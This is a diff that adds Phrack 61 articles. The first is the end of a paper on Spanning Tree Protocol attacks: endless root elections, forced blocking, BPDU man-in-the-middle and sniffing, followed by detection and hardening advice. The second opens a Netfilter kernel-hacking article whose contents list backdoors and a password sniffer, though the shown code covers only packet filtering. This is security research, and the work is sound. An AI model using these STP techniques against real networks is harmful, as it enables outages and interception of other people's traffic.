+   Attacker monitors network with a sniffer (network analyzer) & awaits for
+one of periodical configuration BPDUs from the root bridge (containing its
+identifier). After that he sends into a network a BPDU with identifier that is
+lower then received one (id=id-1) - thus it has pretensions to be a root
+bridge itself & initiates elections. Then it decrement identifier by 1 and
+repeat procedure. Each step initiates new elections wave. When identifier
+reach its lowest value attacker return to the value calculated at beginning of
+the attack. As a result network will be forever in elections of the root
+bridge and ports of STP-capable devices will never reach forwarding state
+while attack is in progress.
+
+Disappearance of root.
+*=*=*=*=*=*=*=*=*=*=*=
+
+    With this attack there is no need to get current root bridge identifier -
+the lowest possible value is a starting one. This, as we remember, means
+maximum priority. At the end of elections attacker stops sending BPDUs, thus
+after a timeout of Max Age Time gives new elections. At new elections attacker
+also acts as before (and wins). By assigning minimum possible Max Age Time it
+is possible to get situation when all the network will spend all time
+reconfigurating, as it could be in previous algorithm. This attack may occur
+less effective, but it has simpler realization. Also, depending to network
+scale and other factors (i.e. Forward Delay value, that vary speed of
+switching into a forwarding state) the ports of STP-capable devices may never
+start forwarding the user frames - so we cannot consider this attack as less
+dangerous.
+
+ Merging-splitting of the trees.
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+  In a network with VLAN support it may be possible to lunch a modification
+of discussed above attack by connecting segments with different vlans & STP
+trees. This may be realized without  software, by hands, by linking ports
+together with a cross-over cable. This may become a pain for NOC, since it's
+hard to detect.
+
+ Local Denial of Service.
+*=*=*=*=*=*=*=*=*=*=*=*=*
+
+  Attacker may make Denial of Service not for the entire network, but just on
+a part of it. There could be many motivations, i.e. it may isolate victim
+client from real server to make ``fake server'' attack. Lets look for
+realization of this type of attack on example. 
+
+ ----------------------------------------------------------------
+                                         
+ .------------------------.                 .------------------.
+ | Switch w/ STP #1       |-----------------| Switch w/ STP #2 |
+ .________________________.                 '__________________'
+    |                |                               |   
+    |                |                               |   .___.
+    |                |                               |   |   |
+    |.....           |  ._                           |   | ==|
+  .------,~          |  ||                           |   | ==|
+  |Client|'          |  ||                            \_ |  -|
+  | PC   ||           \ |....                            |   | 
+  \------ /            '=====|                           |   |
+   ======/             Attackers                        -------
+                       Notebook                          Server
+
+--------------------------Picture 1-----------------------------
+On the picture 1 server is connected to one switch & victim is connected 
+to another one (connectivity to the bridge may include hubs). Attacker 
+needs to fool nearest switch & make it think that he(she) has better way
+to the bridge that serves server computer.
+
+In terms of STP, attacker must initiate & win elections of designated bridge
+for server segment. As a result of winning such elections the channel between
+bridges would be disabled by setting corresponding ports to the blocked state.
+By destroying connectivity between segments attacker may either try to fool
+client claiming itself as a real server (compare with well known Mitnick
+attack) or just feel satisfied if mischief is a subject.
+
+BPDU filter.
+*=*=*=*=*=*=
+
+Obvious way to attack is to set a loop that is undetectable by STP by
+organizing physical ring with filtering there of all BPDU frames. 
+
+Man In the Middle.
+*=*=*=*=*=*=*=*=*=
+
+    Next two attacks have principal difference from already discussed - the
+goal of them not to achieve denial of service, but data penetrating, that
+impossible in the normal network operation mode. In short, this attack uses
+STP to change logical structure of network to direct sensitive traffic via
+attacker's station. Let's look at the 2nd picture.
+
+
+ ----------------------------------------------------------------
+     Clients segment                          Server segment           
+ .------------------------.                 .------------------.
+ | Switch w/ STP #1       |------X X--------| Switch w/ STP #2 |
+ .________________________.                 '__________________'
+    |                |                        |      |   
+    |                |                        |      |   .___.
+    |                |                        |      |   |   |
+    |.....           |   .------.             |      |   | ==|
+  .------,~          |   |      |             |      |   | ==|
+  |Client|'          |   |Attacking           ;       \_,|  -|
+  | PC   ||           \  | PC   |            /           |   | 
+  \------ /            \_========_,         /            |   |
+   ======/              |_________|--------'            -------
+                                                         Server
+
+--------------------------Picture 1-----------------------------
+
+
+As against mentioned above partial denial of service attack, suppose that
+attackers station is equipped with two NICs, one Network Interface Card 
+is connected to the ``client's'' segment, and another - to the ``server's''
+segment. By sending appropriate BPDU attacker initiates elections of the 
+designated bridge for both segments and wins them. As a result, existing
+link between switches (marked as "-X X-" ) will shut down (will switch to 
+the blocking state) and all inter-segment traffic will be directed via 
+attacker's station. If intruder's plans does not include denial of service,
+he(she) MUST provide frame forwarding between NICs. It's a very simple 
+task if attacker doesn't needed to change traffic in some manner. This
+may be done by either creating simple program module or using built-in STP
+functions of the  operating system, for example with Linux Bridge Project (see
+ [13]), which contribute complete bridge solution. Of course, an intruder must
+take in account ``bottle neck'' problem - inter-segment link  may work at
+100Mb (1Gb) speed while client's ports may provide only 10Mb (100Mb) speed,
+which lead to the network productivity degradation and  partial data loss (but
+software realization of back pressure shouldn't be a  big deal). Of course, if
+attacker wants to ``edit'' traffic on the fly on a heavy loaded link, he(she)
+may need more powerful computer (both CPU and RAM). Fortunately, this attack
+is impossible in networks with single switch - try to realize it in these
+conditions and you will get partial DoS. Also note, that realization is
+trivial only when attacker is connected to neighbored switches. If connections
+are made to the switches without direct link, there is additional task -
+guessing at least one Bridge ID, because STP-capable devices never forward
+BPDU, sending on the base of received information its own, instead.
+
+Provocated Sniffing.
+*=*=*=*=*=*=*=*=*=*=
+
+  In general, sniffing is data penetrating by switching network interface
+into promiscuous mode. In this mode NIC receives all the frames, not only
+broadcasts and directed to it. There're well known attack on networks 
+based on switches, these are either poison targets MAC address table by fake
+ARP replies, either over-full bridge switching table and thus making it behave
+like a hub, but with splitting collision domains. Almost the same results may
+be achieved using STP.
+
+  According specification after tree reconfiguration (for example, after
+designated bridge elections) STP-capable device MUST remove from the
+switching table all the records (except those statically set by
+administrator), included before switch  gone into listening and learning
+state. As a result switch will go into hub mode for some time while it refill
+switching table. Of course, you already noted weakness of this theory: switch
+learns too fast. After  receiving first frame from victim it writes its MAC
+address into switching table and stops to broadcast them to all ports.
+However, we must not  ignore this attack. This is because manufacturers
+include in their products some ``extensions'' to core STP. Just after
+elections network is unreachable. To reduce down time some manufacturers
+(Cisco, Avaya, 3Com, HP, etc) include an ability to discard listening and
+learning states on the ``user'' ports (ports with servers and workstations
+connected to). In other words, port is switching from ``blocked'' state
+directly to ``forwarding'' state. This ability has different names: Spanning
+Tree Portfast (Cisco - [11]), STP Fast Start (3Com - [12]) etc. If this
+ability turned on, eternal elections would lead not to DoS, but to periodical
+resets of the switching table, that means hub-mode. Note, that this function
+should not be turned ON on the trunk ports, because STP convergence
+(finalization of elections to a stable state) not guaranteed in this case.
+Fortunately, to achieve its goal an intruder must clear switching table at
+least two times fast than interesting packets are received, that is
+practically impossible. Anyway it allows collecting of some sensitive data.
+Also note, that this attack allows to catch all frames, because it works on
+the channel level of OSI and redirects all protocols (including IPX, NETBEUI 
+etc), not only IP (as ARP-poisoning).
+
+Other possible attacks.
+*=*=*=*=*=*=*=*=*=*=*=*
+
+  These attacks are unchecked, but we suppose, that them are possible.
+
+STP attack on the neighbor VLAN.
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+   According 802.1q a bridge with VLAN support can receive on the given
+channel either all the frames, or the frames with appropriate tags. In
+VLAN-divided networks frames containing STP packets will be transmitted via
+trunk link with appropriate tags. So, there is an ability to attack VLAN by
+sending STP packets in tagged frames to the port, which doesn't support tags.
+Fortunately, according 802.1q a bridge may filter out those frames. For
+example, Cisco devices drop down tagged frames on the tag-incompatible ports
+(at least, users), that makes this attack impossible. But note, that bridge
+MAY, not MUST drop these frames.
+
+STP on WAN links.
+*=*=*=*=*=*=*=*=*
+
+   We also must understand, that WAN links are vulnerable to STP attacks too.
+This because BCP specification declare STP over PPP support. Surprising
+consequence of this fact is an ability to attack ISP network via dial-up
+connection. According RFC2878 (BCP description, see [RFC2878]) STP turned on
+on the PPP link if both sides requesting it, that never takes place in
+practice. Nevertheless, STP supported by default on the majority Cisco
+routers, at least models, capable to combine virtual interfaces into bridge
+group.
+
+This applies to GARP.
+*=*=*=*=*=*=*=*=*=*=*=
+
+   As you may read in the Generic Attribute Registration Protocol (GARP)
+specification by 802.1d the STP is a subset of GARP. Some of discussed above
+attack work against GARP and, in particular, Generic VLAN Registration
+Protocol (GVRP). Therefore VLANs cannot be used as single security measure in
+network. 802.1q standard originated from 802.1d and inherits all its defects.
+ 
+   We may continue our research of non-standard using STP. All new materials
+will be available on the project web-page (see  [3]).
+ 
+
+Brief resume.
+*=*=*=*=*=*=*
+
+So, we shown that unfortunately all networks supporting 802.1d and, 
+with some restrictions, those that support 802.1q are all vulnerable. 
+
+While some devices support STP only if administrator turned on appropriate
+option during configuration process, others support STP by default, ``from
+the box'' (most of current vendors enable STP by default). Ask your admin:
+does our network need STP support? Is STP support turned off on our hardware?
+
+Detection and protection.
+*=*=*=*=*=*=*=*=*=*=*=*=*
+
+   What is the main difficulty with STP-based attacks detection? The problem
+is that for this attack used standard C-BPDU packets, so presence STP packets
+on the network is not strong characteristic of attack. Other difficulty is
+that Intrusion Detection System (IDS) must have in its disposal information
+about network scheme, at least, list of network devices (with bridges IDs) to
+distinguish usual STP traffic from intruder's packets. Moreover, as a main
+goal of attack is network availability, IDS must have its own alarm channel.
+But note that in this case there possible false negatives - attack will not
+detected if malicious BPDUs affect network hardware before IDS disclose them.
+Each real network normal state can be described in STP terms. For example, in
+a network which normally doesn't use STP appearance of STP packets most likely
+signify an STP attack attempt. Series of Root Bridge elections with sequential
+lowering Root Bridge ID may signify ``eternal election'' attack. In a network
+with fixed list of device IDs appearance of BPDUs with new ID in most cases
+may signify an attack (except, of course some ridiculous cases like
+installation of new device by ones of poor-coordinated administration team).
+We suppose, that most effective solution is adaptive self-learning IDS using
+neural networks technology, because the can dynamically compare actual network
+state with ``normal'' state. One of most significant measure is STP fraction
+in total traffic amount.
+
+Quick fix?
+*=*=*=*=*=*
+
+What can network administrators do while problem exists?
+ 
+ - If STP is not barest necessity for your network, it must be disabled. As
+   we noted above, in most devices STP is enabled by default.
+ - In many cases backup links can be controlled using other mechanisms like
+   Link Aggregation. This feature supported by many devices, including Intel,
+   Avaya etc.
+ - If hardware supports individual STP settings on each port then STP must be
+   switched off on all ports except tagged port connected to other network
+   hardware, but not user workstations. Especially this must be taken in
+   account by ISP, because malicious users may attempt to make DoS against
+   either ISP network either other client's networks.
+ - If possible administrators must to segment STP realm, i.e. create several
+   independent spanning trees. Particularly, if two network segment (offices)
+   connected via WAN link, STP on this link must be switched off.
+
+
+Conclusion
+*=*=*=*=*=
+ 
+   Each complicated system inevitably has some errors and communications is
+not an exclusion. But this fact is not a reason to stop evolution of
+information technologies - we can totally escape mistakes only if we do
+nothing. Meanwhile increasing complexity of technologies demand new approach
+to development, an approach, which takes in account all conditions and
+factors, including information security. We suppose that developers must use
+new methods, like mathematical simulation of produced system, which takes in
+account not only specified controlling and disturbing impacts on the system,
+but also predicts system behavior when input values are outside of specified
+range.
+ 
+   It is no wonder that developers in first place take in account primary goal
+of system creation and other questions gives little consideration. But if we
+don't include appropriate security measures while system development, it is
+practically impossible to ``make secure'' this system when it is already
+created. At least, this process is very expensive, because core design lacks
+are hard to detect and too hard (some times - impossible) to repair  in
+contrast to implementation and configuration errors.
+  
+
+References
+*=*=*=*=*=
+  
+ [2]  Our article in Russian in LAN-magazine:
+      http://www.osp.ru/lan/2002/01/088.htm , also there, in paper:
+      Russia, Moscow, LAN, #01/2002, published by ``Open Systems'' publishers.
+ [3]  Other materials of this research are published in full at
+      http://olli.digger.org.ru/STP
+ [4]  Formatted report of our research
+      http://olli.digger.org.ru/STP/STP.pdf
+ [5]  C-code source of BPDU generation program
+      http://olli.digger.org.ru/STP/stp.c
+ [6]  Shell script to manipulate STP parameters
+      http://olli.digger.org.ru/STP/test.sh
+ [7]  ANSI/IEEE 802.1d (Media Access Control, MAC) and ANSI/IEEE 802.1q
+      (Virtual Bridged Local Area Networks) can be downloaded from
+      http://standards.ieee.org/getieee
+ [8]  RFC2878 (PPP Bridging Control Protocol)
+      http://www.ietf.org/rfc/rfc2878.txt
+ [9]  Description of BPDU
+      http://www.protocols.com/pbook/bridge.htm#BPDU
+ [10] Assigned Numbers (RFC1700) http://www.iana.org/numbers.html
+ [11] Cisco STP Portfast feature
+      http://www.cisco.com/warppublic/473/65.html
+ [12] Description of STP support on 3Com SuperStack Switch 1000
+      http://support.3com.com/infodeli/tools/switches/s_stack2/3c16902/man
+      ual.a02/chap51.htm
+ [13] Linux Bridge Project
+      http://bridge.sourceforge.net/
+ [14] Thomas Habets. Playing with ARP
+      http://www.habets.pp.se/synscan/docs/play_arp-draft1.pdf
+  
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/13.txt b/phrack61/13.txt
new file mode 100644
index 0000000..2f64918
--- /dev/null
+++ b/phrack61/13.txt
@@ -0,0 +1,2056 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x0d of 0x0f
+
+|=------------=[ Hacking the Linux Kernel Network Stack ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------=[ bioforge <alkerr@yifan.net> ]=--------------------=|
+
+Table of Contents
+
+1 - Introduction
+  1.1 - What this document is
+  1.2 - What this document is not
+2 - The various Netfilter hooks and their uses
+  2.1 - The Linux kernel's handling of packets
+  2.2 - The Netfilter hooks for IPv4
+3 - Registering and unregistering Netfilter hooks
+4 - Packet filtering operations with Netfilter
+  4.1 - A closer look at hook functions
+  4.2 - Filtering by interface
+  4.3 - Filtering by address
+  4.4 - Filtering by TCP port
+5 - Other possibilities for Netfilter hooks
+  5.1 - Hidden backdoor daemons
+  5.2 - Kernel based FTP password sniffer
+    5.2.1 - The code... nfsniff.c
+    5.2.2 - getpass.c
+6 - Hiding network traffic from Libpcap
+  6.1 - SOCK_PACKET, SOCK_RAW and Libpcap
+  6.2 - Wrapping the cloak around the dagger
+7 - Conclusion
+A - Light-Weight Fire Wall
+  A.1 - Overview
+  A.2 - The source... lwfw.c
+  A.3 - lwfw.h
+B - Code for section 6
+
+
+--[ 1 - Introduction
+
+This article  describes  how  quirks (not necessarily  weaknesses)  in the
+Linux network stack can be used for various purposes, nefarious or otherw-
+ise.  Presented here will be a  discussion on using  seemingly  legitimate
+Netfilter hooks for backdoor communications and also a technique to hide
+such traffic from a Libpcap based sniffer running on the local machine.
+
+Netfilter  is  a   subsystem  in the Linux 2.4  kernel.   Netfilter  makes
+such  network  tricks as  packet  filtering,  network address  translation
+(NAT) and connection tracking possible through the use of various hooks in
+the kernel's network code. These hooks are places that kernel code, either
+statically  built  or  in  the form  of a loadable  module,  can  register
+functions to be called for specific  network events. An example of such an
+event is the reception of a packet.
+
+
+----[ 1.1 - What this document is
+
+This document discusses  how a module writer can make use of the Netfilter
+hooks  for whatever  purposes and also how  network traffic  can be hidden
+from a Libpcap application.  Although  Linux 2.4 supports  hooks for IPv4,
+IPv6 and DECnet,  only IPv4 will be discussed  in this document.  However,
+most of the IPv4 content can be applied to the other protocols. As an aide
+to teaching, a working kernel module that  provides basic packet filtering
+is provided in Appendix A.  Any  development/experimentation done for this
+document  was done on an  Intel machine running  Linux 2.4.5.  Testing the
+behaviour  of  Netfilter  hooks was done  using  the  loopback device,  an
+Ethernet device and a modem Point-to-Point interface.
+
+This  document  is also  written for  my benefit  in an  attempt  to  fully
+understand Netfilter.  I do not guarantee that  any code  accompanying this
+document is 100% error free  but I have  tested all  code provided here.  I
+have suffered  the kernel  faults so hopefully  you won't have to.  Also, I
+do  not  accept any  responsibility  for  damages  that may  occur  through
+following this document. It is expected that the reader be comfortable with
+the C   programming language and have some experience with  Loadable Kernel
+Modules.
+
+If I have  made a mistake in something presented here then please let me
+know. I am also open to suggestions on either improving this document or
+other nifty Netfilter tricks in general.
+
+
+----[ 1.2 - What this document is not
+
+This document is not a complete ins-and-outs reference for Netfilter. It
+is also *not* a reference for the iptables command. If you want to learn
+more about the iptables command, consult the man pages.
+
+So let's get started with an introduction to using Netfilter...
+
+
+--[ 2 - The various Netfilter hooks and their uses
+----[ 2.1 - The Linux kernel's handling of packets
+
+As much as I would love to go into the gory details of Linux's handling of
+packets  and the events  preceeding  and following  each Netfilter hook, I
+won't. The simple  reason is that  Harald Welte has already written a nice
+document  on  the subject,  his Journey  of a Packet Through the Linux 2.4
+Network Stack  document. To learn  more on Linux's  handling of packets, I
+strongly  suggest  that  you  read this  document  as well.  For now, just
+understand that as a packet moves through the Linux kernel's network stack
+it crosses  several hook  locations where packets can be analysed and kept
+or discarded. These are the Netfilter hooks.
+
+
+------[ 2.2 The Netfilter hooks for IPv4
+
+Netfilter defines five hooks for IPv4.  The declaration of the symbols for
+these can be  found in  linux/netfilter_ipv4.h.  These hooks are displayed
+in the table below:
+
+Table 1: Available IPv4 hooks
+
+   Hook                 Called
+NF_IP_PRE_ROUTING   After sanity checks, before routing decisions.
+NF_IP_LOCAL_IN      After routing decisions if packet is for this host.
+NF_IP_FORWARD       If the packet is destined for another interface.
+NF_IP_LOCAL_OUT     For packets coming from local processes on
+		    their way out.
+NF_IP_POST_ROUTING  Just before outbound packets "hit the wire".
+
+The  NF_IP_PRE_ROUTING  hook  is called  as the first  hook after a packet
+has been received.  This is the hook that the module presented later  will
+utilise. Yes the other hooks are  very  useful  as  well, but  for now  we
+will  focus  only on NF_IP_PRE_ROUTING.
+
+After hook  functions have done  whatever  processing they need to do with
+a packet they must  return one of the  predefined  Netfilter return codes.
+These codes are:
+
+Table 2: Netfilter return codes
+Return Code          Meaning
+  NF_DROP        Discard the packet.
+  NF_ACCEPT      Keep the packet.
+  NF_STOLEN      Forget about the packet.
+  NF_QUEUE       Queue packet for userspace.
+  NF_REPEAT      Call this hook function again.
+
+
+The   NF_DROP  return  code  means  that  this  packet  should  be  dropped
+completely  and  any  resources  allocated  for  it  should  be   released.
+NF_ACCEPT tells Netfilter  that so far the  packet is  still acceptable and
+that it  should move to the  next stage of the network stack.  NF_STOLEN is
+an interesting one because it tells Netfilter to "forget" about the packet.
+What this  tells Netfilter is  that the hook  function will take processing
+of this packet from  here and that Netfilter  should drop all processing of
+it.  This does  not  mean,  however, that  resources  for  the  packet  are
+released. The packet and it's respective sk_buff structure are still valid,
+it's just that  the hook  function has  taken  ownership of the packet away
+from  Netfilter.  Unfortunately  I'm  not  exactly  clear on  what NF_QUEUE
+really  does  so  for  now  I won't  discuss  it.  The  last return  value,
+NF_REPEAT requests that Netfilter calls the hook  function again. Obviously
+one must be careful using NF_REPEAT so as to avoid an endless loop.
+
+
+--[ 3 - Registering and unregistering Netfilter hooks
+
+Registration of a  hook  function is a very  simple  process  that revolves
+around  the  nf_hook_ops   structure,  defined  in  linux/netfilter.h.  The
+definition of this structure is as follows:
+
+          struct nf_hook_ops {
+                  struct list_head list;
+
+                  /* User fills in from here down. */
+                  nf_hookfn *hook;
+                  int pf;
+                  int hooknum;
+                  /* Hooks are ordered in ascending priority. */
+                  int priority;
+          };
+
+The  list  member of  this  structure is  used to  maintain  the  lists  of
+Netfilter hooks and has no importance for hook registration as far as users
+are concerned.  hook is a  pointer to a  nf_hookfn  function.  This is  the
+function  that will be  called  for  the  hook.  nf_hookfn  is  defined  in
+linux/netfilter.h as well. The pf field specifies a protocol family.  Valid
+protocol families are available from linux/socket.h but for IPv4 we want to
+use PF_INET.  The  hooknum  field specifies the  particular hook to install
+this function  for and is one of the values listed in table 1. Finally, the
+priority field specifies where in the order of execution this hook function
+should   be   placed.   For  IPv4,   acceptable  values   are   defined  in 
+linux/netfilter_ipv4.h  in the  nf_ip_hook_priorities  enumeration. For the
+purposes of demonstration modules we will be using NF_IP_PRI_FIRST.
+
+Registration  of a  Netfilter hook  requires using a  nf_hook_ops structure
+with the nf_register_hook() function. nf_register_hook() takes the  address
+of an nf_hook_ops structure and returns an integer value.  However, if  you
+actually   look  at   the  code   for  the  nf_register_hook()  function in
+net/core/netfilter.c, you will notice that it only ever returns a  value of
+zero. Provided below is example code that simply registers a function  that
+will drop all  packets that  come  in.  This code  will also  show  how the
+Netfilter return values are interpreted.
+
+Listing 1. Registration of a Netfilter hook
+/* Sample code to install a Netfilter hook function that will
+ * drop all incoming packets. */
+
+#define __KERNEL__
+#define MODULE
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter_ipv4.h>
+
+/* This is the structure we shall use to register our function */
+static struct nf_hook_ops nfho;
+
+/* This is the hook function itself */
+unsigned int hook_func(unsigned int hooknum,
+                       struct sk_buff **skb,
+                       const struct net_device *in,
+                       const struct net_device *out,
+                       int (*okfn)(struct sk_buff *))
+{
+    return NF_DROP;           /* Drop ALL packets */
+}
+
+/* Initialisation routine */
+int init_module()
+{
+    /* Fill in our hook structure */
+    nfho.hook = hook_func;         /* Handler function */
+    nfho.hooknum  = NF_IP_PRE_ROUTING; /* First hook for IPv4 */
+    nfho.pf       = PF_INET;
+    nfho.priority = NF_IP_PRI_FIRST;   /* Make our function first */
+
+    nf_register_hook(&nfho);
+    
+    return 0;
+}
+	
+/* Cleanup routine */
+void cleanup_module()
+{
+    nf_unregister_hook(&nfho);
+}
+
+That's all there is to it.  From the code given in listing 1 you can  see
+that  unregistering  a  Netfilter  hook is a  simple  matter  of  calling
+nf_unregister_hook() with  the address of the same structure  you used to
+register the hook.
+
+
+--[ 4 - Basic packet filtering techniques with Netfilter
+----[ 4.1 - A closer look at hook functions
+
+Now  its  time to  start looking  at what  data gets  passed  into  hook
+functions  and how that data  an be used to make filtering decisions. So
+let's look more  closely at  the prototype  for nf_hookfn functions. The
+prototype is given in linux/netfilter.h as follows:
+
+	  typedef unsigned int nf_hookfn(unsigned int hooknum,
+                                         struct sk_buff **skb,
+                                         const struct net_device *in,
+                                         const struct net_device *out,
+                                         int (*okfn)(struct sk_buff *));
+
+The first argument to  nf_hookfn  functions  is a value specifying one of
+the hook types given in table 1. The second argument is more interesting.
+It is a pointer to a pointer to a  sk_buff  structure, the structure used
+by  the network  stack to describe packets.  This structure is defined in
+linux/skbuff.h  and due to its  size, I shall only highlight some of it's
+more interesting fields here.
+
+Possibly the  most useful fields out of  sk_buff structures are the three
+unions that describe the transport header (ie. UDP, TCP, ICMP, SPX),  the
+network header (ie. IPv4/6, IPX, RAW) and the link layer header (Ethernet
+or RAW). The names of these unions are h, nh and mac respectively.  These
+unions contain several structures, depending on what protocols are in use
+in a  particular packet.  One should note that  the transport  header and
+network header may very well point to the same  location in memory.  This
+is  the  case for TCP packets where  h  and  nh  are both  considered  as
+pointers  to IP header structures.  This means  that attempting  to get a
+value from h->th thinking it's pointing to the TCP header will  result in
+false results because h->th will actually be pointing to the  IP  header,
+just like nh->iph.
+
+Other  fields of  immediate  interest are the  len and  data fields.  len
+specifies the total length of the packet data beginning at data.  So  now
+we know how to access  individual protocol  headers and  the  packet data
+itself  from  a   sk_buff  structure.   What other  interesting  bits  of
+information are available to Netfilter hook functions? 
+
+The  two  arguments  that  come  after   skb   are pointers to net_device
+structures.   net_device  structures are  what the  Linux  kernel uses to
+describe network interfaces of all sorts.  The first of these structures,
+in,  is  used  to  describe the  interface the  packet  arrived on.   Not
+surprisingly, the  out  structure  describes  the interface the packet is
+leaving on.  It is  important to  realise that  usually only one of these
+structures will be provided.  For instance, in will only be provided  for
+the NF_IP_PRE_ROUTING and NF_IP_LOCAL_IN hooks. out will only be provided
+for the  NF_IP_LOCAL_OUT  and  NF_IP_POST_ROUTING  hooks. At this stage I
+haven't  tested  which  of  these  structures  are   available   for  the
+NF_IP_FORWARD hook but if you make sure the pointers  are non-NULL before
+attempting to  dereference  them you  should be fine.
+
+Finally,  the last item passed into a hook function is a function pointer
+called  okfn  that takes a  sk_buff  structure as  its only  argument and
+returns an integer. I'm not too sure on what this function does.  Looking
+in  net/core/netfilter.c  there are two places where this okfn is called.
+These  two places are  in the functions  nf_hook_slow() and nf_reinject()
+where at a  certain place this  function is called on a  return value  of
+NF_ACCEPT from a Netfilter hook. If anybody has more information on  okfn
+please let me know.
+
+Now that we've looked at the most interesting and useful bits of informa-
+tion that our hook functions receive, it's time to look at how we can use
+that information to filter packets in a variety of ways.
+
+
+----[ 4.2 - Filtering by interface
+
+This  would have to  be  the  simplest  filtering  technique  we  can do.
+Remember those net_device structures  our hook  function received?  Using
+the name field from the relevant  net_device  structure allows us to drop
+packets depending on their source interface or destination  interface. To
+drop all packets that  arrive  on interface  eth0 all  one has  to  do is
+compare the value of  in->name  with "eth0".  If the names match then the
+hook function simply returns NF_DROP and the packet is destroyed. It's as
+easy as that. Sample code to do this is provided in listing 2 below. Note
+that the Light-Weight FireWall module will  provide  simple  examples  of
+all the  filtering  methods  presented here.  It also  includes an  IOCTL
+interface and application to change its behaviour dynamically.
+
+Listing 2. Filtering packets based on their source interface
+
+/* Sample code to install a Netfilter hook function that will
+ * drop all incoming packets on an interface we specify */
+ #define __KERNEL__
+ #define MODULE
+ #include <linux/module.h>
+ #include <linux/kernel.h>
+ #include <linux/netdevice.h>
+ #include <linux/netfilter.h>
+ #include <linux/netfilter_ipv4.h>
+ /* This is the structure we shall use to register our function */
+  static struct nf_hook_ops nfho;
+
+ /* Name of the interface we want to drop packets from */
+  static char *drop_if = "lo";
+
+ /* This is the hook function itself */
+  unsigned int hook_func(unsigned int hooknum,
+                         struct sk_buff **skb,
+                         const struct net_device *in,
+                         const struct net_device *out,
+                         int (*okfn)(struct sk_buff *))
+{
+    if (strcmp(in->name, drop_if) == 0) {
+        printk("Dropped packet on %s...\n", drop_if);
+        return NF_DROP;
+    } else {
+        return NF_ACCEPT;
+    }
+}
+
+/* Initialisation routine */
+int init_module()
+{
+    /* Fill in our hook structure */
+    nfho.hook     = hook_func;         /* Handler function */
+    nfho.hooknum  = NF_IP_PRE_ROUTING; /* First hook for IPv4 */
+    nfho.pf       = PF_INET;
+    nfho.priority = NF_IP_PRI_FIRST;   /* Make our function first */
+  
+    nf_register_hook(&nfho);
+    
+    return 0;
+}
+	
+/* Cleanup routine */
+void cleanup_module()
+{
+    nf_unregister_hook(&nfho);
+}
+
+Now isn't that simple? Next, let's have a look at filtering based on IP
+addresses.
+
+
+----[ 4.3 - Filtering by address
+
+As with filtering packets by their interface, filtering packets by their
+source  or  destination  IP address  is very  simple.  This  time we are
+interested in the sk_buff structure. Now remember that the  skb argument
+is a pointer to a pointer to a sk_buff structure.  To avoid running into
+problems it is good practice to declare a seperate pointer to a  sk_buff
+structure  and assign the value pointed to by skb to this newly declared
+pointer. Like so:
+
+      struct sk_buff *sb = *skb;    /* Remove 1 level of indirection* /
+
+Now you  only have to  dereference once  to access  items in the structure.
+Obtaining the IP header for a packet is done using the network layer header
+from the the sk_buff structure. This header is contained in a union and can
+be accessed as sk_buff->nh.iph. The function in listing 3  demonstrates how
+to check the source IP address  of a received packet  against an address to
+deny  when given a  sk_buff  for the  packet.  This  code has  been  pulled
+directly  from  LWFW.  The  only  difference  is that  the update  of  LWFW
+statistics has been removed.
+
+Listing 3. Checking source IP of a received packet
+
+ 	  unsigned char *deny_ip = "\x7f\x00\x00\x01";  /* 127.0.0.1 */
+	  
+	  ...
+
+          static int check_ip_packet(struct sk_buff *skb)
+          {
+              /* We don't want any NULL pointers in the chain to
+	       * the IP header. */
+              if (!skb )return NF_ACCEPT;
+              if (!(skb->nh.iph)) return NF_ACCEPT;
+          
+              if (skb->nh.iph->saddr == *(unsigned int *)deny_ip) { 
+	          return NF_DROP;
+              }
+
+              return NF_ACCEPT;
+          }
+
+Now if the source address matches the address we want to drop packets from
+then the  packet is  dropped.  For this  function to work as presented the
+value of  deny_ip  should be  stored  in  Network Byte Order  (Big-endian,
+opposite of Intel).  Although  it's  unlikely that  this  function will be
+called  with a  NULL pointer  for it's  argument,  it never  hurts to be a
+little paranoid.  Of course if an  error does occur then the function will
+return NF_ACCEPT so that  Netfilter  can continue  processing  the packet.
+Listing 4 presents the simple module  used to  demonstrate interface based
+filtering  changed so  that it drops packets that  match a  particular  IP
+address.
+
+Listing 4. Filtering packets based on their source address
+          /* Sample code to install a Netfilter hook function that will
+          * drop all incoming packets from an IP address we specify */
+
+          #define __KERNEL__
+          #define MODULE
+
+          #include <linux/module.h>
+          #include <linux/kernel.h>
+          #include <linux/skbuff.h>
+          #include <linux/ip.h>                  /* For IP header */
+          #include <linux/netfilter.h>
+          #include <linux/netfilter_ipv4.h>
+
+          /* This is the structure we shall use to register our function */
+          static struct nf_hook_ops nfho;
+
+          /* IP address we want to drop packets from, in NB order */
+          static unsigned char *drop_ip = "\x7f\x00\x00\x01";
+
+          /* This is the hook function itself */
+          unsigned int hook_func(unsigned int hooknum,
+                                 struct sk_buff **skb,
+                                 const struct net_device *in,
+                                 const struct net_device *out,
+                                 int (*okfn)(struct sk_buff *))
+          {
+              struct sk_buff *sb = *skb;
+
+              if (sb->nh.iph->saddr == drop_ip) {
+                  printk("Dropped packet from... %d.%d.%d.%d\n",
+		  	  *drop_ip, *(drop_ip + 1),
+			  *(drop_ip + 2), *(drop_ip + 3));
+                  return NF_DROP;
+              } else {
+                  return NF_ACCEPT;
+              }
+          }
+
+          /* Initialisation routine */
+          int init_module()
+          {
+              /* Fill in our hook structure */
+              nfho.hook     = hook_func;
+              /* Handler function */
+              nfho.hooknum  = NF_IP_PRE_ROUTING; /* First for IPv4 */
+              nfho.pf       = PF_INET;
+              nfho.priority = NF_IP_PRI_FIRST;   /* Make our func first */
+          
+              nf_register_hook(&nfho);
+
+              return 0;
+          }
+          
+	  /* Cleanup routine */
+          void cleanup_module()
+          {
+              nf_unregister_hook(&nfho);
+          }
+
+
+----[ 4.4 - Filtering by TCP port
+
+Another simple  rule to  implement is the  filtering of  packets based on
+their TCP destination port.  This is only a bit more fiddly than checking
+IP addresses because  we need  to  create  a  pointer  to  the TCP header
+ourselves.  Remember what was discussed earlier about  transport  headers
+and  network  headers?  Getting a pointer  to the TCP header  is a simple
+matter of allocating a pointer to a struct tcphdr (define in linux/tcp.h)
+and  pointing after the IP header in our packet data.  Perhaps an example
